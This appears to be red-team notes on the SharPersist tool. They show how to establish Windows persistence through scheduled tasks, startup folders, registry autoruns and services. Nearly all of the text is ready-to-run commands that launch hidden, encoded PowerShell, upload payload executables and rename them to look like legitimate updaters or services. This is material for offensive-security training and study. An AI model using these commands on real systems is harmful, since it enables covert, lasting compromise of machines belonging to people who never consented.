SharPersist

https://github.com/mandiant/SharPersist

- Scheduled Tasks

The Windows Task Scheduler allows us to create "tasks" that execute on a pre-determined trigger. That trigger could be a time of day, on user-logon, when the computer goes idle, when the computer is locked, or a combination thereof.

SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc {encoded command (Explotaition/Remote Shell/Powershell)}" -n "Updater" -m add -o hourly

Where:

-t is the desired persistence technique.

-c is the command to execute.

-a are any arguments for that command.

-n is the name of the task.

-m is to add the task (you can also remove, check and list).

-o is the task frequency.

- Startup Folder

Applications, files and shortcuts within a user's startup folder are launched automatically when they first log in. It's commonly used to bootstrap the user's home environment (set wallpapers, shortcut's etc).

SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc {encoded command}" -f "UserEnvSetup" -m add

- HKCU / HKLM Registry Autoruns

AutoRun values in HKCU and HKLM allow applications to start on boot. You commonly see these to start native and 3rd party applications such as software updaters, download assistants, driver utilities and so on.

Example:

cd C:\ProgramData

upload C:\Payloads\http_x64.exe

mv http_x64.exe updater.exe

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

Where:

-k is the registry key to modify.

-v is the name of the registry key to create.

- Windows Services

To create our own service:

cd C:\Windows

upload C:\Payloads\tcp-local_x64.svc.exe

mv tcp-local_x64.svc.exe legit-svc.exe

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add